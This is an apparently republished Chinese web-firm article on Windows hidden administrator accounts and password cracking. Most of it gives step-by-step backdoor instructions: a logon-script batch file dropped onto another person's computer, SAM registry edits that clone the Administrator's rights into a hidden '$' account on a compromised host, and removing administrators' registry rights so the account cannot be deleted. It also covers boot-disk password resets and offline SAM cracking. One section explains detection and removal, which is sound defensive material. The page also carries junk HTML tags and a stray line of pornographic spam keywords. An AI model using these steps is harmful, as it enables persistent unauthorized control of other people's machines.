<rt id="tf2wb"><bdo id="tf2wb"><kbd id="tf2wb"></kbd></bdo></rt>
    1. <button id="tf2wb"><thead id="tf2wb"></thead></button>

      <rp id="tf2wb"><bdo id="tf2wb"></bdo></rp>
      <delect id="tf2wb"><td id="tf2wb"></td></delect>
      <rt id="tf2wb"></rt>
      <rt id="tf2wb"><bdo id="tf2wb"></bdo></rt>
    2. 企業(yè)與個(gè)人網(wǎng)絡(luò )營(yíng)銷(xiāo)一站式服務(wù)商
      網(wǎng)站建設 / SEO優(yōu)化排名 / 小程序開(kāi)發(fā) / OA
      0731-88571521
      136-3748-2004
      服務(wù)器添加隱藏賬號和檢查刪除隱藏賬號的方法
      信息來(lái)源:斌網(wǎng)網(wǎng)絡(luò )   發(fā)布時(shí)間:2010-6-25   瀏覽:

        一.建立一個(gè)別人永遠刪不掉的管理員用戶(hù)

        操作步驟:

        1、在自己電腦里面建立一個(gè).txt文本文件.

        2、在里面輸入內容

        @echo off

        net user yixiao 123456 /add 注釋?zhuān)呵懊鎦ixiao是用戶(hù)名后面123456是密碼;

        net localgroup administrators yixiao /add

        3、把這個(gè)文件保存,更改后綴為yixiao.bat 注釋?zhuān)呵懊婷蛛S便,后面格式一定要是bat;

        4、把這個(gè)文件拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目錄下,沒(méi)有的話(huà)自己創(chuàng )建。

        完成,下次對方電腦無(wú)論如何都有這個(gè)管理員帳號,刪除了,下次啟動(dòng)還有!

        如果把里面的內容改成

        @echo off

        net user administrator 123456 /add

        意思是不管你怎么改,下次啟動(dòng)管理員帳號administrator密碼一直是123456。

        二.俺認為上述的方法并不理想,可以用隱藏帳號方法來(lái)建帳號會(huì )更好 。

        操作步驟:

        1、首先建立一個(gè)帳號結尾要帶$號 ,如果yixiao$ , 密碼自己隨便,然后把帳號刪除.

        2、將以下代碼保存成(.reg)注冊表形式

        代碼如下:

        -------------------------------------------------------------------------------

        Windows Registry Editor Version 5.00

        [HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\

        names\yixiao$]

        @=hex(1f4):

        -------------------------------------------------------------------------------

        說(shuō)明:1f4是Administrator帳號十六進(jìn)制的值

        3、保存好后導入 ,然后用CMD命令設置密碼

        net user yixiao$ 123456

        這樣一個(gè)隱形帳號就建立好了,用戶(hù)在“本地用戶(hù)和組”內根本無(wú)法看到這個(gè)帳號。所以也不存在刪除帳號。記得千萬(wàn)別在同事的電腦上搗鼓哦,如果被查出來(lái)。。。。。嘿嘿:-)

        隱藏管理員帳號三分鐘搞定

        對 regedit.exe我想大家都很熟悉,但卻不能對注冊表的項鍵設置權限,而regedt32.exe最大的優(yōu)點(diǎn)就是能夠對注冊表的項鍵設置權限。 nt/2000/xp的帳戶(hù)信息都在注冊表的HKEY_LOCAL_MACHINE\\SAM\\SAM鍵下,但是除了系統用戶(hù)SYSTEM外,其它用戶(hù) 都無(wú)權查看到里面的信息,因此我首先用regedt32.exe對SAM鍵為我設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進(jìn)行讀寫(xiě)了了。具體 步聚如下:

        1、假設我們是以超級用戶(hù)administrator登錄到開(kāi)有終端服務(wù)的肉雞上的,首先在命令行下或帳戶(hù)管理器中建立一個(gè)帳戶(hù):hacker$,這里我在命令行下建立這個(gè)帳戶(hù) net user hacker$ 1234 /add

        2、在開(kāi)始/運行中輸入:regedt32.exe并回車(chē)來(lái)運行regedt32.exe。

        3、點(diǎn)“權限”以后會(huì )彈出窗口點(diǎn)添加將我登錄時(shí)的帳戶(hù)添加到安全欄內,這里我是以administrator的身份登錄的,所以我就將 administrator加入,并設置權限為“完全控制"。這里需要說(shuō)明一下:最好是添加你登錄的帳戶(hù)或帳戶(hù)所在的組,切莫修改原有的帳戶(hù)或組,否則將 會(huì )帶來(lái)一系列不必要的問(wèn)題。等隱藏超級用戶(hù)建好以,再來(lái)這里將你添加的帳戶(hù)刪除即可。

        4、再點(diǎn)“開(kāi)始”→“運行”并輸 入"regedit.exe" 回車(chē),啟動(dòng)注冊表編輯器regedit.exe。 打開(kāi)鍵:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names \\hacker$"

        5、將項hacker$、00000409、000001F4導出為hacker.reg、409.reg、 1f4.reg,用記事本分別打這幾個(gè)導出的文件進(jìn)行編輯,將超級用戶(hù)對應的項000001F4下的鍵"F"的值復制,并覆蓋hacker$對應的項 00000409下的鍵"F"的值,然后再將00000409.reg與hacker.reg合并。

        6、在命令行下執行net user hacker$ /del將用戶(hù)hacker$刪除:net user hacker$ /del

        7、在regedit.exe的窗口內按F5刷新,然后打文件-導入注冊表文件將修改好的hacker.reg導入注冊表即可

        8、到此,隱藏的超級用戶(hù)hacker$已經(jīng)建好了,然后關(guān)閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINE\\SAM\\SAM鍵權限改回原來(lái)的樣子(只要刪除添加的帳戶(hù)administrator即可)。

        9、注意:隱藏的超級用戶(hù)建好后,在帳戶(hù)管理器看不到hacker$這個(gè)用戶(hù),在命令行用“net user”命令也看不到,但是超級用戶(hù)建立以后,就不能再改密碼了,如果用net user命令來(lái)改hacker$的密碼的話(huà),那么在帳戶(hù)管理器中將又會(huì )看這個(gè)隱藏的超級用戶(hù)了,而且不能刪除。

        建立與刪除隱藏的管理員帳號

        當黑客入侵一臺主機后,會(huì )想方設法保護自己的“勞動(dòng)成果”,因此會(huì )在肉雞上留下種種后門(mén)來(lái)長(cháng)時(shí)間得控制肉雞,其中使用最多的就是賬戶(hù)隱藏技術(shù)。在肉雞上 建立一個(gè)隱藏的賬戶(hù),以備需要的時(shí)候使用。賬戶(hù)隱藏技術(shù)可謂是最隱蔽的后門(mén),一般用戶(hù)很難發(fā)現系統中隱藏賬戶(hù)的存在,因此危害性很大,本文就對隱藏賬戶(hù)這 種黑客常用的技術(shù)進(jìn)行揭密。

        在隱藏系統賬戶(hù)之前,我們有必要先來(lái)了解一下如何才能查看系統中已經(jīng)存在的賬戶(hù)。在系統中可以進(jìn)入“命令 提示符”,控制面板的“計算機管理”,“注冊表”中對存在的賬戶(hù)進(jìn)行查看,而管理員一般只在“命令提示符”和“計算機管理”中檢查是否有異常,因此如何讓 系統賬戶(hù)在這兩者中隱藏將是本文的重點(diǎn)。

        一、“命令提示符”中的陰謀

        其實(shí),制作系統隱藏賬戶(hù)并不是十分高深的技術(shù),利用我們平時(shí)經(jīng)常用到的“命令提示符”就可以制作一個(gè)簡(jiǎn)單的隱藏賬戶(hù)。

        點(diǎn)擊“開(kāi)始”→“運行”,輸入“CMD”運行“命令提示符”,輸入“net user piao$ 123456 /add”,回車(chē),成功后會(huì )顯示“命令成功完成”。接著(zhù)輸入“net localgroup administrators piao$ /add”回車(chē),這樣我們就利用“命令提示符”成功得建立了一個(gè)用戶(hù)名為“piao$”,密碼為“123456”的簡(jiǎn)單“隱藏賬戶(hù)”,并且把該隱藏賬戶(hù)提 升為了管理員權限。

        我們來(lái)看看隱藏賬戶(hù)的建立是否成功。在“命令提示符”中輸入查看系統賬戶(hù)的命令“net user”,回車(chē)后會(huì )顯示當前系統中存在的賬戶(hù)。從返回的結果中我們可以看到剛才我們建立的“piao$”這個(gè)賬戶(hù)并不存在。接著(zhù)讓我們進(jìn)入控制面板的“ 管理工具”,打開(kāi)其中的“計算機”,查看其中的“本地用戶(hù)和組”,在“用戶(hù)”一項中,我們建立的隱藏賬戶(hù)“piao$”暴露無(wú)疑。

        可以總結得出的結論是:這種方法只能將賬戶(hù)在“命令提示符”中進(jìn)行隱藏,而對于“計算機管理”則無(wú)能為力。因此這種隱藏賬戶(hù)的方法并不是很實(shí)用,只對那些粗心的管理員有效,是一種入門(mén)級的系統賬戶(hù)隱藏技術(shù)。

        二、在“注冊表”中玩轉賬戶(hù)隱藏

        從上文中我們可以看到用命令提示符隱藏賬戶(hù)的方法缺點(diǎn)很明顯,很容易暴露自己。那么有沒(méi)有可以在“命令提示符”和“計算機管理”中同時(shí)隱藏賬戶(hù)的技術(shù)呢?答案是肯定的,而這一切只需要我們在“注冊表”中進(jìn)行一番小小的設置,就可以讓系統賬戶(hù)在兩者中完全蒸發(fā)。

        1、峰回路轉,給管理員注冊表操作權限

        在注冊表中對系統賬戶(hù)的鍵值進(jìn)行操作,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”處進(jìn)行修改,但是當我們來(lái)到該處時(shí),會(huì )發(fā)現無(wú)法 展開(kāi)該處所在的鍵值。這是因為系統默認對系統管理員給予“寫(xiě)入DAC”和“讀取控制”權限,沒(méi)有給予修改權限,因此我們沒(méi)有辦法對“SAM”項下的鍵值進(jìn) 行查看和修改。不過(guò)我們可以借助系統中另一個(gè)“注冊表編輯器”給管理員賦予修改權限。

        點(diǎn)擊“開(kāi)始”→“運行”,輸入 “regedt32.exe”后回車(chē),隨后會(huì )彈出另一個(gè)“注冊表編輯器”,和我們平時(shí)使用的“注冊表編輯器”不同的是它可以修改系統賬戶(hù)操作注冊表時(shí)的權 限(為便于理解,以下簡(jiǎn)稱(chēng)regedt32.exe)。在regedt32.exe中來(lái)到“HKEY_LOCAL_MACHINE\SAM\SAM”處, 點(diǎn)擊“安全”菜單→“權限”,在彈出的“SAM的權限”編輯窗口中選中“administrators”賬戶(hù),在下方的權限設置處勾選“完全控制”,完成 后點(diǎn)擊“確定”即可。然后我們切換回“注冊表編輯器”,可以發(fā)現“HKEY_LOCAL_MACHINE\SAM\SAM”下面的鍵值都可以展開(kāi)了。

        提示:上文中提到的方法只適用于Windows NT/2000系統。在Windows XP系統中,對于權限的操作可以直接在注冊表中進(jìn)行,方法為選中需要設置權限的項,點(diǎn)擊右鍵,選擇“權限”即可。

        2、偷梁換柱,將隱藏賬戶(hù)替換為管理員

        成功得到注冊表操作權限后,我們就可以正式開(kāi)始隱藏賬戶(hù)的制作了。來(lái)到注冊表編輯器的“HKEY_LOCAL_MACHINE\SAM\SAM \Domains\Account\Users\Names”處,當前系統中所有存在的賬戶(hù)都會(huì )在這里顯示,當然包括我們的隱藏賬戶(hù)。點(diǎn)擊我們的隱藏賬戶(hù) “piao$”,在右邊顯示的鍵值中的“類(lèi)型”一項顯示為0x3e9,向上來(lái)到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains \Account\Users\”處,可以找到“000003E9”這一項,這兩者是相互對應的,隱藏賬戶(hù)“piao$”的所有信息都在 “000003E9”這一項中。同樣的,我們可以找到“administrator”賬戶(hù)所對應的項為“000001F4”。

        將 “piao$”的鍵值導出為piao$.reg,同時(shí)將“000003E9”和“000001F4”項的F鍵值分別導出為 user.reg,admin.reg。用“記事本”打開(kāi)admin.reg,將其中“F”值后面的內容復制下來(lái),替換user.reg中的“F”值內 容,完成后保存。接下來(lái)進(jìn)入“命令提示符”,輸入“net user piao$ /del”將我們建立的隱藏賬戶(hù)刪除。最后,將piao$.reg和user.reg導入注冊表,至此,隱藏賬戶(hù)制作完成。

        3、過(guò)河拆橋,切斷刪除隱藏賬戶(hù)的途徑

        雖然我們的隱藏賬戶(hù)已經(jīng)在“命令提示符”和“計算機管理”中隱藏了,但是有經(jīng)驗的系統管理員仍可能通過(guò)注冊表編輯器刪除我們的隱藏賬戶(hù),那么如何才能讓我們的隱藏賬戶(hù)堅如磐石呢?

        打開(kāi)“regedt32.exe”,來(lái)到“HKEY_LOCAL_MACHINE\SAM\SAM”處,設置“SAM”項的權限,將 “administrators”所擁有的權限全部取消即可。當真正的管理員想對“HKEY_LOCAL_MACHINE\SAM\SAM”下面的項進(jìn)行 操作的時(shí)候將會(huì )發(fā)生錯誤,而且無(wú)法通過(guò)“regedt32.exe”再次賦予權限。這樣沒(méi)有經(jīng)驗的管理員即使發(fā)現了系統中的隱藏賬戶(hù),也是無(wú)可奈何的。

        三.專(zhuān)用工具,使賬戶(hù)隱藏一步到位

        雖然按照上面的方法可以很好得隱藏賬戶(hù),但是操作顯得比較麻煩,并不適合新手,而且對注冊表進(jìn)行操作危險性太高,很容易造成系統崩潰。因此我們可以借助專(zhuān)門(mén)的賬戶(hù)隱藏工具來(lái)進(jìn)行隱藏工作,使隱藏賬戶(hù)不再困難,只需要一個(gè)命令就可以搞定。

        我們需要利用的這款工具名叫“HideAdmin”,下載下來(lái)后解壓到c盤(pán)。然后運行“命令提示符”,輸入“HideAdmin piao$ 123456”即可,如果顯示“Create a hiden Administrator piao$ Successed!”,則表示我們已經(jīng)成功建立一個(gè)賬戶(hù)名為piao$,密碼為123456的隱藏賬戶(hù)。利用這款工具建立的賬戶(hù)隱藏效果和上文中修改注 冊表的效果是一樣的。

        四、把“隱藏賬戶(hù)”請出系統

        隱藏賬戶(hù)的危害可謂十分巨大。因此我們有必要在了解了賬戶(hù)隱藏技術(shù)后,再對相應的防范技術(shù)作一個(gè)了解,把隱藏賬戶(hù)徹底請出系統。

        1、添加“$”符號型隱藏賬戶(hù)

        對于這類(lèi)隱藏賬戶(hù)的檢測比較簡(jiǎn)單。一般黑客在利用這種方法建立完隱藏賬戶(hù)后,會(huì )把隱藏賬戶(hù)提升為管理員權限。那么我們只需要在“命令提示符”中輸入 “net localgroup administrators”就可以讓所有的隱藏賬戶(hù)現形。如果嫌麻煩,可以直接打開(kāi)“計算機管理”進(jìn)行查看,添加“$”符號的賬戶(hù)是無(wú)法在這里隱藏 的。

        2、修改注冊表型隱藏賬戶(hù)

        由于使用這種方法隱藏的賬戶(hù)是不會(huì )在“命令提示符”和“計算機管理”中看到的,因此可以到 注冊表中刪除隱藏賬戶(hù)。來(lái)到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把這 里存在的賬戶(hù)和“計算機管理”中存在的賬戶(hù)進(jìn)行比較,多出來(lái)的賬戶(hù)就是隱藏賬戶(hù)了。想要刪除它也很簡(jiǎn)單,直接刪除以隱藏賬戶(hù)命名的項即可。

        3、無(wú)法看到名稱(chēng)的隱藏賬戶(hù)

        如果黑客制作了一個(gè)修改注冊表型隱藏賬戶(hù),在此基礎上刪除了管理員對注冊表的操作權限。那么管理員是無(wú)法通過(guò)注冊表刪除隱藏賬戶(hù)的,甚至無(wú)法知道黑客建 立的隱藏賬戶(hù)名稱(chēng)。不過(guò)世事沒(méi)有絕對,我們可以借助“組策略”的幫助,讓黑客無(wú)法通過(guò)隱藏賬戶(hù)登陸。點(diǎn)擊“開(kāi)始”→“運行”,輸入 “gpedit.msc”運行“組策略”,依次展開(kāi)“計算機配置”→“Windows 設置”→“安全設置”→“本地策略”→“審核策略”,雙擊右邊的“審核策略更改”,在彈出的設置窗口中勾選“成功”,然后點(diǎn)“確定”。對“審核登陸事件” 和“審核過(guò)程追蹤”進(jìn)行相同的設置。

        進(jìn)行登陸審核后,可以對任何賬戶(hù)的登陸操作進(jìn)行記錄,包括隱藏賬戶(hù),這樣我們就可以通過(guò)“計算機管理”中 的“事件查看器”準確得知隱藏賬戶(hù)的名稱(chēng),甚至黑客登陸的時(shí)間。即使黑客將所有的登陸日志刪除,系統還會(huì )記錄是哪個(gè)賬戶(hù)刪除了系統日志,這樣黑客的隱藏賬 戶(hù)就暴露無(wú)疑了。

        得知隱藏賬戶(hù)的名稱(chēng)后就好辦了,但是我們仍然不能刪除這個(gè)隱藏賬戶(hù),因為我們沒(méi)有權限。但是我們可以在“命令提示符”中輸入“net user 隱藏賬戶(hù)名稱(chēng) 654321”更改這個(gè)隱藏賬戶(hù)的密碼。這樣這個(gè)隱藏賬戶(hù)就會(huì )失效,黑客無(wú)法再用這個(gè)隱藏賬戶(hù)登陸。

        win2003下創(chuàng )建永遠的隱藏帳戶(hù)操作一、二

        前段時(shí)間比較流行的一句話(huà)”肉機”其實(shí)要想控制遠端的計算機,那我想就少不了隱藏用戶(hù)帳號的問(wèn)題了,其實(shí)創(chuàng )建隱藏用戶(hù)帳號還是比較簡(jiǎn)單的,現在我就把創(chuàng )建隱藏用戶(hù)帳號告訴大家。

        其實(shí)每一個(gè)用戶(hù)帳號在注冊表中都有自己帳號數據項

        首先我們看看管理員在注冊表中的數據項是什么樣的

        操作一、打開(kāi)注冊表:HKEY_LOCAL_MACHINE\SAM\SAM

        SAM是保存用戶(hù)帳號的地方,不過(guò)這個(gè)“項”在默認情況下是不可見(jiàn)的。我們如果想看內部的內容就必須首先對其授權。(建議對注冊表不是很熟悉的朋友不要隨便改動(dòng)注冊表)

        操作二、認識注冊表中的帳號分類(lèi)

        在OS中的用戶(hù)帳號無(wú)論是內置帳號,還是后建帳號,在注冊表中都能看見(jiàn)。不過(guò)有兩個(gè)帳號大家一定要能夠認識,那就是管理員帳號和guest帳號。

        ”000001fa4”表示的是管理員帳號,即使管理員帳號被重命名了這個(gè)值也是不會(huì )變的,所以我們可以通過(guò)這個(gè)值來(lái)判斷,重命名后的管理員帳號。

        “000001fa5” 表示的是guest帳號,同樣這個(gè)值也不會(huì )因為,來(lái)賓帳號給重命名而改變。剩下的其 它值基本上就是后來(lái)創(chuàng )建的用戶(hù)帳號,生成值了。 認識了注冊表后,現在我們就來(lái)利用”net user”命令創(chuàng )建帳號了,創(chuàng )建隱藏帳號必須在CMD下。有關(guān)常見(jiàn)的命令,這些命令也可以在OS的幫助中找到。

        操作三、利用”net user”命令創(chuàng )建帳號

        一、先建立隱藏用戶(hù) xbx$ 1、net user xbx$ 123,abc /add 這里的意思是說(shuō),建立個(gè)xbx$ 帳戶(hù)密碼是123,abc

        1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 這里的意思是說(shuō)把xbx,以便讓我們創(chuàng )建用戶(hù)具備管理員權限。

        一、觀(guān)察注冊表中的變化,并對注冊表做相應的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

        1、找到我們剛剛創(chuàng )建的用戶(hù)帳號

        我們可以看見(jiàn)”000003f6”就是我們剛新建立的”xbx

        2、在注冊表中多帳號權限復制

        找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 這個(gè)項,打開(kāi)”000001f4”項,然后再打開(kāi)”F”。

        然后將這里面的值,全選,粘帖并覆蓋到”000003f6”的”F”值.

        3、導出注冊表值

        現在將注冊表中的“000001f4”、“000003f6”和“xbx"都導入出來(lái),可直接將Users所有鍵值都導出來(lái),到文件.

        4、刪除帳號

        接下來(lái)我們再次進(jìn)入“CMD”中刪除“xbx

        刪除帳號后,則注冊表中的值也就沒(méi)有了,這個(gè)時(shí)候我們再把剛才導出的注冊表項,導入到注冊表中。 這個(gè)時(shí)候我們打開(kāi)“本地計算機用戶(hù)和組”就看不見(jiàn)“xbx"

        系統密碼破解方法總結

        一、ERD2003

        利用ERD2003強行修改系統管理員密碼的方法簡(jiǎn)單、易于操作,且對2000/xp/2003系統均有效。下面就具體介紹一下這個(gè)軟件的用法。

        1.下載ERD2003的iso,刻錄成可啟動(dòng)的CD,注意別搞錯了,直接刻錄鏡像最好。

        2.設置系統從光盤(pán)啟動(dòng),進(jìn)入“系統”后,ERD2003會(huì )針對系統的網(wǎng)絡(luò )等硬件設備進(jìn)行一些設置,總之遇到要你選擇時(shí)一概選“yes”即可。

        3.接下來(lái)ERD2003會(huì )在你的硬盤(pán)里搜索所有已安裝的系統,再讓你選擇要修改的系統。

        4.耐心等待,進(jìn)入系統后:按start—administrative tools—locksmith,進(jìn)入強行修改密碼的界面,隨后彈出的對話(huà)框會(huì )讓你選擇要修改密碼的用戶(hù)名,選擇后即可強行修改密碼而不用輸入原始密碼,然后點(diǎn)擊NEXT,之后重啟。

        二、PASSWARE KIT 5.0中的Windows KEY 5.0

        也有一些工具光盤(pán)里有這個(gè)程序,直接光盤(pán)運行就可以了。

        如果找不到這種光盤(pán),運行PASSWARE KIT 5.0后生成3個(gè)文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF,3個(gè)文件共50KB。

        把這3個(gè)文件放在任何軟盤(pán)中,然后使用XP安裝光盤(pán)啟動(dòng)電腦,啟動(dòng)過(guò)程中按F6鍵讓系統采用第三方驅動(dòng)程序。

        此時(shí),正是我們切入的最好時(shí)機,放入該軟盤(pán)就會(huì )自動(dòng)跳到Windows KEY的界面。軟件會(huì )自動(dòng)檢測系統中安裝的Windows 2000/XP/2003并列一個(gè)表供用戶(hù)選擇,當出現提示“Please enter your selection 1..? or 0 to quit:”(根據檢測到已安裝操作系統的數量,“?”可能是1到9之間的某個(gè)數字)時(shí),按相應的數字鍵進(jìn)行選擇。接著(zhù)出現提示“Set local Administrator password to‘12345’?(Y/N):”,即問(wèn)是否把“Administrator”的密碼修改為“12345”,按Y鍵,軟件首先自動(dòng)備份原密碼,然后把 “Administrator”的密碼修改為“12345”。從光驅中取出光盤(pán),重新啟動(dòng)計算機,如果Windows XP歡迎界面中沒(méi)有列出“Administrator”用戶(hù),那么就連續按兩次“Ctrl+Alt+Del”組合鍵,這時(shí)就會(huì )出現輸入用戶(hù)名和密碼的界 面,在“用戶(hù)名”中輸入“Administrator”,在“密碼”中輸入“12345”,單擊“確定”按鈕就可以登錄Windows XP了。

        提示:第一次登錄Windows XP,系統會(huì )提示你密碼已到期,要不要進(jìn)行修改。你可以根據需要自行選擇。

        這 個(gè)方法還可以恢復原來(lái)的密碼 !!如果只是臨時(shí)使用系統,使用完Windows XP后還想恢復原來(lái)的“Administrator”的密碼,可按下面的方法操作。 先按照修改“Administrator”密碼的步驟一和步驟二進(jìn)行操作,接著(zhù)就會(huì )出現提示“Would you like to undo Windows XP/2000/NT Key changes?(Y/N):”,按Y鍵,軟件就會(huì )自動(dòng)恢復原來(lái)的“Administrator”密碼,接著(zhù)又出現提示“Set local Administrator password to ‘12345’?(Y/N):”,按N鍵,不要把“Administrator”的密碼修改為“12345”。從光驅中取出光盤(pán),重新啟動(dòng)計算機,就完成 了密碼恢復。

        三、DreamPackPL

        將下載回來(lái)的軟件DreamPackPL解壓縮到硬盤(pán)上一個(gè)方便的位置,然后運 行其中的DreamPack.exe文件,在軟件界面上選中放入Windows安裝光盤(pán)的光驅?zhuān)缓簏c(diǎn)擊“Make ISO CD image”按鈕,程序將創(chuàng )建一個(gè)ISO格式的光盤(pán)鏡像,并需要你指定保存該鏡像文件的目錄。創(chuàng )建好后用光盤(pán)刻錄軟件將該鏡像文件刻錄到光盤(pán)中,然后使用 這張光盤(pán)引導電腦啟動(dòng)。Windows的安裝程序將會(huì )自動(dòng)運行,到某時(shí)按R鍵進(jìn)入故障恢復控制臺。隨后安裝程序會(huì )自動(dòng)顯示所有已經(jīng)安裝的Windows操 作系統,使用數字鍵選擇你想要進(jìn)入的操作系統的故障恢復控制臺,然后按下回車(chē)。當需要輸入管理員密碼的時(shí)候也不用擔心,我們并不知道密碼是什么,但是我們 要只要,直接按下回車(chē)就可以跳過(guò)這一步。隨后進(jìn)入System32文件夾:cd system32,并把該目錄下的文件sfcfiles.dll重命名為其他名稱(chēng):ren sfcfiles.dll sfcfiles.lld。接著(zhù)我們從光盤(pán)中I386目錄下復制文件pinball.ex_到System32文件夾中,并命名為 sfcfiles.dll:copy d:\i386\ pinball.ex_ sfcfiles.dll。至此前期工作已經(jīng)全部做完了,把光盤(pán)拿出來(lái),然后輸入exit命令退出控制臺,并重啟動(dòng)電腦。以上所作的一切只是為了替換系統 中的sfcfiles.dll文件,因此如果你的操作系統安裝在FAT32文件系統的分區上,那就更簡(jiǎn)單了,只要直接用Windows 98啟動(dòng)盤(pán)引導電腦進(jìn)入DOS,并在DOS下用DreamPackPL軟件壓縮包中的sfcfiles.dll文件替換System32目錄下的原同名文 件即可(注意不要忘了Windows的文件保護,備份文件也要替換)。

        忘記了電腦中管理員帳戶(hù)的密碼。那么可以在重啟后顯示的界面上點(diǎn)擊“Details”按鈕,隨后可以看到和平常的帳戶(hù)管理界面類(lèi)似界面,選中想要修改密碼的帳戶(hù),然后點(diǎn)擊窗口下方的“重設密碼”按鈕,輸入新的密碼后點(diǎn)擊確定即可。

        四、其他的方法

        1.一個(gè)dos下破解密碼的軟件,DOSPASS。

        2.直接用安裝盤(pán)啟動(dòng)安裝界面時(shí)按Shift+F10,打開(kāi)一個(gè)命令行窗口,用net user administrator 123 修改密碼為123,用SHIFT+F10打開(kāi)CMD后運行SET不加參數可以看到密碼。

        3. 使用OFFICE NT PASSWORD & REGISTRY EDITOR。用該軟件可以制作LINUX啟動(dòng)盤(pán),這個(gè)啟動(dòng)盤(pán)可以訪(fǎng)問(wèn)NTFS文件系統,因此可以很好地支持Windows 2000/XP。使用該軟盤(pán)中的一個(gè)運行在LINUX下的工具NTPASSWD就可以解決問(wèn)題,并且可以讀取注冊表并重寫(xiě)賬號。使用方法很簡(jiǎn)單,只需根據 其啟動(dòng)后的提示一步一步做就可以了。在此,建議你使用快速模式,這樣會(huì )列出用戶(hù)供你選擇修改那個(gè)用戶(hù)密碼。默認選擇ADMIN組用戶(hù),自動(dòng)找到把 ADMINISTRATOR的名字換掉的用戶(hù),十分方便。

        五、網(wǎng)上其他一些傳說(shuō)中破解Windows2000/WindowsXP/Windows2003密碼的方法

        1.進(jìn)入DOS刪除sam文件——這種方法對win2000有效,對xp和2003不但無(wú)效,還會(huì )導致系統死鎖而徹底無(wú)法使用。

        2.用winpe啟動(dòng)進(jìn)控制臺,然后用dos命令手動(dòng)增添用戶(hù)——除非原來(lái)管理員密碼(指的是安全模式下的那個(gè)管理員)就沒(méi)有設置,否則無(wú)效。

        3. 將屏幕保護改名,將cmd.exe改名為logon.scr(當然要掛在別的機器上改了),開(kāi)機后等待10分鐘進(jìn)入屏幕保護,實(shí)際上就進(jìn)入了 dos命令行界面,可以用net命令加用戶(hù)——已證明在sp1、sp2、2003中,這樣進(jìn)入dos后的權限根本不是管理員,因此也無(wú)法添加用戶(hù)。

        4. 硬盤(pán)掛到別的機器上,考出system32文件夾中的sam文件,用lc4暴力解密——理論上是可以的,打開(kāi)并新建一個(gè)任務(wù),然后依次擊 “IMPORT→Import from SAM file”,打開(kāi)已待破解的SAM文件,此時(shí)LC4會(huì )自動(dòng)分析此文件,并顯示出文件中的用戶(hù)名;之后點(diǎn)擊“Session→Begin Audit”,即可開(kāi)始破解密碼。但如果密碼比較復雜的話(huà),解密時(shí)間會(huì )極其的長(cháng)。




      上一條: asp定時(shí)生成靜態(tài)HTML的代碼
      下一條: IIS下ASP目錄漏洞和IIS分號漏洞(;)的臨時(shí)解決方法 防止asp加分號上傳jpg文件被當成asp運行
      案例鑒賞
      多年的網(wǎng)站建設經(jīng)驗,斌網(wǎng)網(wǎng)絡(luò )不斷提升技術(shù)設計服務(wù)水平,迎合搜索引擎優(yōu)化規則
      法律法規
      多年的網(wǎng)站建設經(jīng)驗,網(wǎng)至普不斷提升技術(shù)設計服務(wù)水平,迎合搜索引擎優(yōu)化規則
      長(cháng)沙私人做網(wǎng)站    長(cháng)沙做網(wǎng)站    深圳網(wǎng)站建設    株洲做網(wǎng)站    東莞做網(wǎng)站    南京防腐木    湖南大拇指養豬設備    株洲做網(wǎng)站    
      版權所有 © 長(cháng)沙市天心區斌網(wǎng)網(wǎng)絡(luò )技術(shù)服務(wù)部    湘公網(wǎng)安備 43010302000270號  統一社會(huì )信用代碼:92430103MA4LAMB24R  網(wǎng)站ICP備案號:湘ICP備13006070號-2  
      国产精品久久久久精品|久久网国产精品色婷婷免费|国产另类小说 视频 中文字幕|亚洲欧洲日产国码在线|2020最新国产在线不卡A|无码人妻少妇久久中文字幕蜜|99国产一区二区精品久久

          <rt id="tf2wb"><bdo id="tf2wb"><kbd id="tf2wb"></kbd></bdo></rt>
        1. <button id="tf2wb"><thead id="tf2wb"></thead></button>

          <rp id="tf2wb"><bdo id="tf2wb"></bdo></rp>
          <delect id="tf2wb"><td id="tf2wb"></td></delect>
          <rt id="tf2wb"></rt>
          <rt id="tf2wb"><bdo id="tf2wb"></bdo></rt>